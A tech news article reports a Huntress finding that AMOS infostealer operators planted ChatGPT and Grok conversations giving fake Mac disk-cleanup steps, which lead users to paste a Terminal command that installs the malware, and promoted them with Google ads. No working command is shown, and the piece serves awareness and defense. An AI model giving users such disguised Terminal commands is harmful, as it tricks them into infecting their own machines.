- AMOS Operators Used Malvertising and Poisoned ChatGPT/Grok Conversations to Push Mac Malware
- Fake “free disk space” guides tricked users into running Terminal commands that installed AMOS
- The campaign abused Google ads and trusted AI platforms, increasing the credibility and success of the infection.
AtomicOS (AMOS) criminals are using a combination of malvertising and GenAI response poisoning to trick MacOS users into downloading malware. This is according to cybersecurity researchers Huntress, who claim to have not only observed the attacks in the wild, but also replicated the same results as other victims.
In a blog post published earlier this week, Huntress said that AMOS maintainers first created two AI conversations: one with ChatGPT and one with Grok.
These conversations were about how to free up disk space on a MacOS device and included instructions on how to do so. However, the instructions are fake and instead tell the user to open the Terminal app and type a command that downloads and executes the AMOS infostealer.
A twist to ClickFix
From there, they purchased ad space on Google to promote these conversations. That way, when a user searches for something like “how to free up disk space on MacOS,” these poisoned threads will show up at the top of the search engine results page.
Apparently the trick worked, because Huntress was brought in to investigate a case of AMOS infections. For those who don’t know, AMOS is an infamous MacOS information stealer, capable of stealing sensitive data, passwords, cryptocurrency wallet information, and more.
The scam works similarly to ClickFix, another technique that tricks victims into executing Terminal commands. The only difference is that in this case the victims are actually proactively seeking a solution to a real problem, rather than a non-existent one. What makes this campaign more dangerous is that it abuses not one, but three trusted services: the Google search engine, ChatGPT, and Grok Answers.
At the end of the day, both conversations are hosted on their respective platforms, increasing the perceived legitimacy of both instructions. However, it is unclear how the AMOS operators got ChatGPT and Grok to display these results.
Through Apple Insider
The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to receive news, reviews and opinions from our experts in your feeds. Be sure to click the Follow button!
And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp also.
